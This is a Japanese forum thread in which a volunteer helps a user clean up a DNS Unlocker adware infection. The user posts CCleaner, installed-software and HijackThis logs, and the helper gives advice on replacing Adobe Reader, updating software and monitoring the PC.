有効 Task Adobe Flash Player Updater Adobe Systems Incorporated C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
有効 Task CCleanerSkipUAC Piriform Ltd "C:\Program Files\CCleaner\CCleaner.exe" $(Arg0)
有効 Task DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000Core Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe /c
有効 Task DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000UA Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe /ua /installsource scheduler
有効 Task GoogleUpdateTaskMachineCore Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c
有効 Task GoogleUpdateTaskMachineUA Google Inc. C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
有効 Task PMMUpdate Egis Technology Inc. "C:\Program Files\EgisTec IPS\PMMUpdate.exe"
有効 Task UALU notificatin Acer Incorporated "C:\Program Files\Acer\Acer Updater\UALU.exe"
有効 Task {D0CA0B4E-A50D-488A-974E-DEB3A0548969} Google Inc. "c:\program files (x86)\google\chrome\application\chrome.exe" http://ui.skype.com/ui/0/6.20.0.104/ja/abandoninstall?page=tsProgressBar


cc コンテキストメニュー ----------------

有効 Directory 7-Zip Igor Pavlov C:\Program Files\7-Zip\7-zip.dll
有効 Directory DropboxExt Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll
有効 Directory ShExplzh pon software C:\Windows\SysWOW64\ShExplzh.dll
有効 Directory ShExplzh64 pon software C:\Windows\system32\shexplzh.dll
有効 Directory VLCメディアプレイヤーで再生 VideoLAN "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --no-playlist-enqueue "%1"
有効 Directory VLCメディアプレイヤーのプレイリストに追加 VideoLAN "C:\Program Files (x86)\VideoLAN\VLC\vlc.exe" --started-from-file --playlist-enqueue "%1"
有効 Directory 書庫内検索(I)... pon software C:\Program Files\Explzh\Explzh.exe /f %1
有効 Drive ShExplzh64 pon software C:\Windows\system32\shexplzh.dll
有効 Drive 書庫内検索(I)... pon software C:\Program Files\Explzh\Explzh.exe /f %1
有効 File 7-Zip Igor Pavlov C:\Program Files\7-Zip\7-zip.dll
有効 File DropboxExt Dropbox, Inc. C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll
有効 File MWLIVShellExt Egis Technology Inc. C:\Program Files (x86)\EgisTec MyWinLocker\x64\MWLIVShellExt.dll
有効 File ShExplzh pon software C:\Windows\SysWOW64\ShExplzh.dll
有効 File ShExplzh64 pon software C:\Windows\system32\shexplzh.dll
有効 File ShredderContextMenu Egis Technology Inc. C:\Program Files (x86)\EgisTec Shredder\x64\ShredderContextMenu.dll
有効 Folder ShExplzh64 pon software C:\Windows\system32\shexplzh.dll
  • あすとろ
  • 2015/09/16 (Wed) 23:12:01
返信フォームへ 
インストール情報ログもお願いします
おはようございます。
現在の各ログを見せていただきましたが、あとひとつインストール情報ログが出てないので、このログも追加で見せてください。

焦らなくていいですからお時間ある時にマイペースで作業とレスされればいいです
  • 悪代官
  • 2015/09/17 (Thu) 07:06:57
返信フォームへ 
Re: DNSunlockerの感染
こんにちは

またまたすみません…インストールログも貼っていきます。


7-Zip 9.20 (x64 edition) Igor Pavlov 2014/04/02 4.53 MB 9.20.00.0
Acer Backup Manager NTI Corporation 2012/06/20 3.0.0.100
Acer eRecovery Management Acer Incorporated 2012/06/20 5.00.3508
Acer Registration Acer Incorporated 1.04.3507
Acer ScreenSaver Acer Incorporated 20.11.1107.1418
Adobe AIR Adobe Systems Incorporated 2014/04/23 13.0.0.83
Adobe Flash Player 18 ActiveX Adobe Systems Incorporated 18.0.0.232
Adobe Flash Player 18 NPAPI Adobe Systems Incorporated 18.0.0.232
Adobe Reader X (10.1.15) MUI Adobe Systems Incorporated 2015/09/07 548 MB 10.1.15
Apple Application Support(32 ビット) Apple Inc. 2015/04/18 94.2 MB 3.1.3
Apple Application Support(64 ビット) Apple Inc. 2015/04/18 107 MB 3.1.3
Apple Mobile Device Support Apple Inc. 2015/08/24 23.1 MB 8.1.1.3
Apple Software Update Apple Inc. 2014/04/07 2.38 MB 2.1.3.127
Battlelog Web Plugins EA Digital Illusions CE AB 2.6.2
Bonjour Apple Inc. 2014/06/04 2.00 MB 3.0.0.10
Borderlands 2 Gearbox Software
Broadcom Card Reader Driver Installer Broadcom Corporation 2013/08/08 2.76 MB 15.0.7.3
Broadcom NetLink Controller Broadcom Corporation 2012/06/20 524 KB 15.0.7.1
Broadcom Wireless Utility Broadcom Corporation 5.100.82.120
CCleaner Piriform 5.09
Chrome Remote Desktop Host Google Inc. 2015/09/03 18.0 MB 45.0.2454.17
CyberLink MediaEspresso CyberLink Corp. 2012/06/20 6.5.2727_43992
DisplayLink Core Software DisplayLink Corp. 2015/06/22 26.8 MB 7.8.63104.0
DisplayLink Graphics DisplayLink Corp. 2015/06/22 4.48 MB 7.8.63153.0
Dropbox Dropbox, Inc. 3.8.8
ETDWare PS/2-X64 10.6.9.9_WHQL ELAN Microelectronic Corp. 10.6.9.9
Explzh for Windows (64bit) pon software 7.2.3.0
Fallout 3 - Game of the Year Edition Bethesda Game Studios
Google Chrome Google Inc. 2015/09/09 45.0.2454.93
Google 日本語入力 Google Inc. 2015/09/12 86.9 MB 2.17.2300.0
Hangame
Identity Card Acer Incorporated 1.00.3501
Intel(R) Control Center Intel Corporation 1.2.1.1007
Intel(R) Management Engine Components Intel Corporation 8.0.2.1410
Intel(R) OpenCL CPU Runtime Intel Corporation
Intel(R) Processor Graphics Intel Corporation 8.15.10.2712
Intel(R) Rapid Storage Technology Intel Corporation 11.1.0.1006
Intel® Trusted Connect Service Client Intel Corporation 2013/08/08 10.6 MB 1.23.605.1
iTunes Apple Inc. 2015/08/24 242 MB 12.1.2.27
Jane Style Version 3.83 Jane, Inc. 2015/04/06 3.83
Janetter 4.3.0.2 Jane, Inc. 2014/11/26
Java 8 Update 60 Oracle Corporation 2015/09/07 20.6 MB 8.0.600.27
Launch Manager Acer Inc. 5.1.15
League of Legends Riot Games 2015/05/18 3.0.1
Left 4 Dead 2 Valve
LEGO® Worlds TT Games
Logicool ゲーム ソフトウェア 8.57 Logicool 8.57.145
LogMeIn Hamachi LogMeIn, Inc. 2015/08/03 2.2.0.383
Microsoft .NET Framework 4.5.1 (日本語) Microsoft Corporation 4.5.50938
Microsoft .NET Framework 4.5.2 Microsoft Corporation 2015/05/18 4.5.51209
Microsoft Games for Windows - LIVE Redistributable Microsoft Corporation 2015/06/22 32.5 MB 2.0.672.0
Microsoft OneDrive Microsoft Corporation 17.3.5930.0814
Microsoft Security Essentials Microsoft Corporation 2015/05/18 4.8.204.0
Microsoft Silverlight Microsoft Corporation 2015/05/18 150 MB 5.1.40416.0
Microsoft SQL Server 2005 Compact Edition [ENU] Microsoft Corporation 2012/06/20 1.69 MB 3.1.0000
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2013/08/08 2.62 MB 8.0.59193
Microsoft Visual C++ 2005 Redistributable (x64) Microsoft Corporation 2014/04/07 572 KB 8.0.61000
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 Microsoft Corporation 2013/08/08 788 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 Microsoft Corporation 2014/04/08 788 KB 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 Microsoft Corporation 2015/03/06 1.41 MB 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2012/06/20 608 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2012/06/20 586 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 Microsoft Corporation 2013/08/08 592 KB 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 Microsoft Corporation 2014/04/08 600 KB 9.0.30729.6161
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Corporation 2015/06/22 15.2 MB 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 2015/06/22 12.2 MB 10.0.40219
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 Microsoft Corporation 11.0.61030.0
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 Microsoft Corporation 11.0.61030.0
Microsoft XNA Framework Redistributable 4.0 Microsoft Corporation 2014/08/05 8.03 MB 4.0.20823.0
Mozilla Firefox 40.0.3 (x86 ja) Mozilla 40.0.3
Mozilla Maintenance Service Mozilla 40.0.3
MyWinLocker Suite Egis Technology Inc. 2012/06/20 4.0.14.19
Norton Online Backup Symantec Corporation 2012/06/20 6.19 MB 2.1.17869
NTI Media Maker 9 NTI Corporation 2013/08/08 9.0.2.9006
Origin Electronic Arts, Inc. 9.4.7.2799
Portal 2 Valve
PunkBuster Services Even Balance, Inc. 0.994
Realtek High Definition Audio Driver Realtek Semiconductor Corp. 2013/08/08 6.0.1.6543
RED BELT SKIN Series 2014/10/18
Skype Click to Call Microsoft Corporation 2015/09/07 7.16 MB 7.4.0.9058
Skype(TM) 7.8 Skype Technologies S.A. 2015/09/07 71.1 MB 7.8.102
Starbound
Starbound - Unstable
Steam Valve Corporation
TeamSpeak 3 Client TeamSpeak Systems GmbH 3.0.16
Terraria Re-Logic
The Walking Dead
The Walking Dead: Season Two Telltale Games
Unity Web Player Unity Technologies ApS
Vivaldi Vivaldi 2015/06/30 1.0.162.9
VLC media player VideoLAN 2.2.1
Welcome Center Acer Incorporated 1.02.3507
Windows Live Essentials Microsoft Corporation 2012/06/20 15.4.3538.0513
World of Warships Wargaming.net 2015/05/01
XMedia Recode バージョン 3.1.9.0 XMedia Recode 2014/06/21 3.1.9.0
らくらく無線スタートEX NEC AccessTechnica, Ltd.
インテル(R) ターボ・ブースト・テクノロジー・モニター 2.5 インテル 2013/08/08 13.2 MB 2.5.1.0
  • あすとろ
  • 2015/09/17 (Thu) 15:16:38
返信フォームへ 
少し更新も
作業と報告、ご苦労様です。
情報ログも見せてもらいました。
最近異常に多発しているAdobe Readerの更新不全は残ってますが、これはもうAdobe側の修正対処を待つしかなさそうですね。
ではpdfは別のアプリでの対応をお勧めします。

まずAdobe ReaderはGUを使ってアンインストールしてください。
普通にアンインストールするのでなく「エントリの削除」で強制削除してください。

そのあと下記のpdfアプリをインストールしてください。
http://www.forest.impress.co.jp/library/software/pdfxchange/

これはAdobe Readerよりも脆弱性が少なく、使い勝手も高評価なpdfアプリです。

それと下記も現在最新じゃないので、更新するか削除の2択です。
>Skype(TM) 7.8 Skype Technologies S.A. 2015/09/07 71.1 MB 7.8.102

これができたらまた一度PC再起動後、インストール情報ログだけ取り直して、それを見せてください
  • 悪代官
  • 2015/09/17 (Thu) 17:46:30
返信フォームへ 
Re: DNSunlockerの感染
>それと下記も現在最新じゃないので、更新するか削除の2択です。
skypeは更新したいと思います。

そして大変勝手で申し訳ないのですが今日から連休で家を離れるので作業ができなくなり、報告も一週間ほど後になると思います。

期間が空きますが帰宅したらすぐに作業に移りたいと思っています。

それでは少しの間だけ失礼します。
  • あすとろ
  • 2015/09/17 (Thu) 21:15:55
返信フォームへ 
無理ない範囲で作業とレスをどうぞ
こんばんは。
お忙しいようなので、こちらは気にしなくていいです。
無理のないペースで作業とレスされればいいですよ
  • 悪代官
  • 2015/09/18 (Fri) 21:46:35
返信フォームへ 
Re: DNSunlockerの感染
大変お待たせいたしました、作業が完了したのでログを貼らせていただきます。

ログにAdobe Readerが残っていますが、GU上では削除できている(表示されない)みたいです。
warld of war shipsは使用しないと判断したので同様に処理しました。


7-Zip 9.20 (x64 edition) Igor Pavlov 2014/04/02 4.53 MB 9.20.00.0
Acer Backup Manager NTI Corporation 2012/06/20 337 MB 3.0.0.100
Acer eRecovery Management Acer Incorporated 2012/06/20 5.00.3508
Acer Registration Acer Incorporated 2013/08/08 1.04.3507
Acer ScreenSaver Acer Incorporated 2013/08/08 20.11.1107.1418
Adobe AIR Adobe Systems Incorporated 2014/04/23 13.0.0.83
Adobe Flash Player 19 ActiveX Adobe Systems Incorporated 2015/09/24 17.4 MB 19.0.0.185
Adobe Flash Player 19 NPAPI Adobe Systems Incorporated 2015/09/24 17.9 MB 19.0.0.185
Adobe Reader X (10.1.15) MUI 2015/09/07
Apple Application Support(32 ビット) Apple Inc. 2015/04/18 94.2 MB 3.1.3
Apple Application Support(64 ビット) Apple Inc. 2015/04/18 107 MB 3.1.3
Apple Mobile Device Support Apple Inc. 2015/08/24 23.1 MB 8.1.1.3
Apple Software Update Apple Inc. 2014/04/07 2.38 MB 2.1.3.127
Battlelog Web Plugins EA Digital Illusions CE AB 2015/02/04 2.6.2
Bonjour Apple Inc. 2014/06/04 2.00 MB 3.0.0.10
Borderlands 2 Gearbox Software 2015/03/06
Broadcom Card Reader Driver Installer Broadcom Corporation 2013/08/08 2.76 MB 15.0.7.3
Broadcom NetLink Controller Broadcom Corporation 2012/06/20 524 KB 15.0.7.1
Broadcom Wireless Utility Broadcom Corporation 2013/08/08 5.100.82.120
CCleaner Piriform 2015/09/06 5.09
Chrome Remote Desktop Host Google Inc. 2015/09/24 18.1 MB 46.0.2490.13
CyberLink MediaEspresso CyberLink Corp. 2012/06/20 166 MB 6.5.2727_43992
DisplayLink Core Software DisplayLink Corp. 2015/06/22 26.8 MB 7.8.63104.0
DisplayLink Graphics DisplayLink Corp. 2015/06/22 4.48 MB 7.8.63153.0
Dropbox Dropbox, Inc. 2015/09/04 3.8.8
ETDWare PS/2-X64 10.6.9.9_WHQL ELAN Microelectronic Corp. 2013/08/08 10.6.9.9
Explzh for Windows (64bit) pon software 2014/11/26 7.2.3.0
Fallout 3 - Game of the Year Edition Bethesda Game Studios 2015/06/22
Google Chrome Google Inc. 2015/09/09 45.0.2454.99
Google 日本語入力 Google Inc. 2015/09/12 86.9 MB 2.17.2300.0
Hangame 2015/06/10
Identity Card Acer Incorporated 2013/08/08 1.00.3501
Intel(R) Control Center Intel Corporation 2013/08/09 1.2.1.1007
Intel(R) Management Engine Components Intel Corporation 2013/08/09 8.0.2.1410
Intel(R) OpenCL CPU Runtime Intel Corporation 2013/08/08
Intel(R) Processor Graphics Intel Corporation 2013/08/09 8.15.10.2712
Intel(R) Rapid Storage Technology Intel Corporation 2013/08/09 11.1.0.1006
Intel® Trusted Connect Service Client Intel Corporation 2013/08/08 10.6 MB 1.23.605.1
iTunes Apple Inc. 2015/08/24 242 MB 12.1.2.27
Jane Style Version 3.83 Jane, Inc. 2015/04/06 3.83
Janetter 4.3.0.2 Jane, Inc. 2014/11/26
Java 8 Update 60 Oracle Corporation 2015/09/07 20.6 MB 8.0.600.27
Launch Manager Acer Inc. 2013/08/08 5.1.15
League of Legends Riot Games 2015/05/18 3.0.1
Left 4 Dead 2 Valve 2014/06/19
LEGO® Worlds TT Games 2015/06/22
Logicool ゲーム ソフトウェア 8.57 Logicool 2015/04/06 110 MB 8.57.145
LogMeIn Hamachi LogMeIn, Inc. 2015/08/03 2.2.0.383
Microsoft .NET Framework 4.5.1 (日本語) Microsoft Corporation 2014/04/09 2.93 MB 4.5.50938
Microsoft .NET Framework 4.5.2 Microsoft Corporation 2015/01/29 38.8 MB 4.5.51209
Microsoft Games for Windows - LIVE Redistributable Microsoft Corporation 2015/06/22 32.5 MB 2.0.672.0
Microsoft OneDrive Microsoft Corporation 2015/08/20 36.1 MB 17.3.5930.0814
Microsoft Security Essentials Microsoft Corporation 2015/05/18 4.8.204.0
Microsoft Silverlight Microsoft Corporation 2015/05/18 150 MB 5.1.40416.0
Microsoft SQL Server 2005 Compact Edition [ENU] Microsoft Corporation 2012/06/20 1.69 MB 3.1.0000
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2012/06/20 300 KB 8.0.59193
Microsoft Visual C++ 2005 Redistributable (x64) Microsoft Corporation 2013/08/08 708 KB 8.0.61000
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 Microsoft Corporation 2013/08/08 788 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 Microsoft Corporation 2014/04/08 788 KB 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 Microsoft Corporation 2015/03/06 1.41 MB 9.0.21022
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2012/06/20 608 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2012/06/20 586 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 Microsoft Corporation 2013/08/08 592 KB 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 Microsoft Corporation 2014/04/08 600 KB 9.0.30729.6161
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Corporation 2015/06/22 15.2 MB 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 2015/06/22 12.2 MB 10.0.40219
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 Microsoft Corporation 2015/06/22 20.5 MB 11.0.61030.0
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 Microsoft Corporation 2015/06/22 17.3 MB 11.0.61030.0
Microsoft XNA Framework Redistributable 4.0 Microsoft Corporation 2014/08/05 8.03 MB 4.0.20823.0
Mozilla Firefox 40.0.3 (x86 ja) Mozilla 2015/09/14 84.7 MB 40.0.3
Mozilla Maintenance Service Mozilla 2015/09/13 233 KB 40.0.3
MyWinLocker Suite Egis Technology Inc. 2012/06/20 2.63 MB 4.0.14.19
Norton Online Backup Symantec Corporation 2012/06/20 6.19 MB 2.1.17869
NTI Media Maker 9 NTI Corporation 2013/08/08 0.96 GB 9.0.2.9006
Origin Electronic Arts, Inc. 2014/05/11 9.4.7.2799
PDF-Viewer Tracker Software Products Ltd 2015/09/26 23.5 MB 2.5.315.0
Portal 2 Valve 2015/01/29
PunkBuster Services Even Balance, Inc. 2015/02/04 0.994
Realtek High Definition Audio Driver Realtek Semiconductor Corp. 2013/08/08 6.0.1.6543
RED BELT SKIN Series 2014/10/18
Skype Click to Call Microsoft Corporation 2015/09/26 10.2 MB 7.4.0.9058
Skype(TM) 7.10 Skype Technologies S.A. 2015/09/26 72.6 MB 7.10.101
Starbound 2015/01/29
Starbound - Unstable 2015/06/22
Steam Valve Corporation 2014/04/23
TeamSpeak 3 Client TeamSpeak Systems GmbH 2015/02/22 3.0.16
Terraria Re-Logic 2014/08/05
The Walking Dead 2015/01/29
The Walking Dead: Season Two Telltale Games 2015/01/29
Unity Web Player Unity Technologies ApS 2014/05/12 12.0 MB
VLC media player VideoLAN 2015/09/07 2.2.1
Welcome Center Acer Incorporated 2013/08/08 1.02.3507
Windows Live Essentials Microsoft Corporation 2012/06/20 15.4.3538.0513
XMedia Recode バージョン 3.1.9.0 XMedia Recode 2014/06/21 23.6 MB 3.1.9.0
らくらく無線スタートEX NEC AccessTechnica, Ltd. 2014/07/08
インテル(R) ターボ・ブースト・テクノロジー・モニター 2.5 インテル 2013/08/08 13.2 MB 2.5.1.0
  • あすとろ
  • 2015/09/26 (Sat) 01:30:25
返信フォームへ 
新たなpdfアプリは問題ないですか
作業と報告、ご苦労様です。

>ログにAdobe Readerが残っていますが、GU上では削除できている(表示されない)みたいです。
>warld of war shipsは使用しないと判断したので同様に処理しました。

はい、わかりました。ではそこはいいです。

pdfアプリのインストールもできたようですね。
新しいpdfアプリの使い勝手はどうでしょうか。
もし使いにくいようなら別のpdfアプリに替えることも可能ですが、あまり怪しげなアプリに飛びつくと傷口を広げることもあるので、別のpsfアプリを入れたいならその旨教えてください。
特定のアプリを使いたいなら、そのアプリ名をレスで教えてくれれば自分がそれを調べてもいいです
  • 悪代官
  • 2015/09/26 (Sat) 21:16:30
返信フォームへ 
Re: DNSunlockerの感染
>pdfアプリのインストールもできたようですね。
>新しいpdfアプリの使い勝手はどうでしょうか。

今のところはpdfファイルをあまり使わないのでなんとも言えないです…(笑)

折角入れたこともありますし今後使うことがあれば慣れるついでに使っていこうと思います。
  • あすとろ
  • 2015/09/27 (Sun) 01:33:50
返信フォームへ 
それでは全体の状態を再確認です
おはようございます。

>今のところはpdfファイルをあまり使わないのでなんとも言えないです

なるほど、ではとりあえずそのまま入れておくといいでしょう。
今後pdfファイルの閲覧することがあったらその時に確認するといいです。
お持ちの家電製品やPC用の各種アプリ、ハード等の公式サイトでマニュアルや説明を調べる時にpdfで表示しているところも多いので、pdf閲覧アプリは入れておくに越したことはないです。

Adobe Readerですが、最近特にバグがひどくなってきたように見えます。
他の方の相談でももはやまともに最新版に更新できている方のほうが珍しいほどです。
なので現時点ではAdobe Readerをお使いの方には一度アンインストールしてもらったうえで、代替のpdfアプリに入れ替えを推奨するようにしました。
いくら無償アプリでも更新不全削除不全が多発してそれの修正もできないのでは入れるだけでも問題です。

それでは現在また何か異常は出ていますか?
あればそのことを教えてください。
  • 悪代官
  • 2015/09/27 (Sun) 07:12:42
返信フォームへ 
Re: DNSunlockerの感染
こんにちは。

>Adobe Readerですが、最近特にバグがひどくなってきたように見えます。
>他の方の相談でももはやまともに最新版に更新できている方のほうが珍しいほどです。

初耳でした、ならアンインストールしても問題ないですね。

今のところは目立った症状も無く、その他アドウェアの危害もなく問題なく使えています。
  • あすとろ
  • 2015/09/27 (Sun) 13:17:33
返信フォームへ 
後は様子見の結果待ちですね
今夜もレスが遅くなりました。

>今のところは目立った症状も無く、その他アドウェアの危害もなく問題なく使えています。

はい、異常も治まっているようですね。
Adobeの脆弱性はそれを悪用する攻撃が世界中で絶えないため、間接的ながら感染の原因としては古くからかなり深刻な問題なのです。
他のアプリでも更新を怠るとそれを突いての攻撃で感染受けてしまうことは多いので、WindowsUpdateを含めて各種更新は常にチェックをお忘れなく。

では異常も治まっているようなので、しばらく様子見をお願いします。
普通にPCを使いながらでいいので1週間様子見してください。

1週間後にまたCCの各タブのログとインストール情報とHJTログを取り直して、それらを様子見中の状態報告とともにレスください。

この様子見後の時点でログと状態がどうなっているかが最後の峠になるでしょうが、何か異常再発でも見えたら1週間待たずにいいのでそこで報告ください。

何事もなく様子見が終わるのを祈ります
  • 悪代官
  • 2015/09/27 (Sun) 21:12:22
返信フォームへ 
Re: DNSunlockerの感染
>Adobeの脆弱性はそれを悪用する攻撃が世界中で絶えないため、間接的ながら感染の原因としては古くからかなり深刻な問題なのです。
他のアプリでも更新を怠るとそれを突いての攻撃で感染受けてしまうことは多いので、WindowsUpdateを含めて各種更新は常にチェックをお忘れなく。

勉強になりました、以降は気をつけたいと思います。

ではしばらく様子見してみますので少しの間、失礼します。
  • あすとろ
  • 2015/09/27 (Sun) 22:45:51
返信フォームへ 
Re: DNSunlockerの感染
返信が遅くなり、申し訳ございません。

指示された通り様子見をしてみましたが以前のように問題なく使えていると思います。

以下、ログになります。


hjt--------------

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 12:26:43, on 2015/10/05
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v9.00 (9.00.8112.16659)

FIREFOX: 40.0.3 (x86 ja)
Boot mode: Normal

Running processes:
C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe
C:\Program Files (x86)\Launch Manager\LManager.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaConverter.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaRenderer.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Program Files (x86)\Janetter2\bin\janettersrv.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Users\【ユーザー名】\Downloads\HijackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe
O1 - Hosts: 127.0.0.1 localhost
O1 - Hosts: ::1 localhost
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll
O4 - HKLM\..\Run: [SuiteTray] "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
O4 - HKLM\..\Run: [BackupManagerTray] "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
O4 - HKLM\..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKCU\..\Run: [Dropbox Update] "C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKUS\S-1-5-18\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'Default user')
O4 - Startup: Dropbox.lnk = 【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O17 - HKLM\System\CCS\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\..\{5079169B-AD83-42A3-B1B3-C04B8C96D5A8}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CCS\Services\Tcpip\..\{C678E09F-B902-4D1E-87D2-AE9B8DCDE689}: NameServer = 192.168.50.1
O17 - HKLM\System\CS1\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O17 - HKLM\System\CS2\Services\Tcpip\..\{0D1049C0-2DE4-4B95-B96D-43C07C70251C}: NameServer = 199.203.131.145,82.163.143.167
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Bonjour サービス (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Chrome リモート デスクトップ サービス (chromoting) - Google Inc. - C:\Program Files (x86)\Google\Chrome Remote Desktop\46.0.2490.13\remoting_host.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: DisplayLinkManager (DisplayLinkService) - DisplayLink Corp. - C:\Program Files\DisplayLink Core Software\DisplayLinkManager.exe
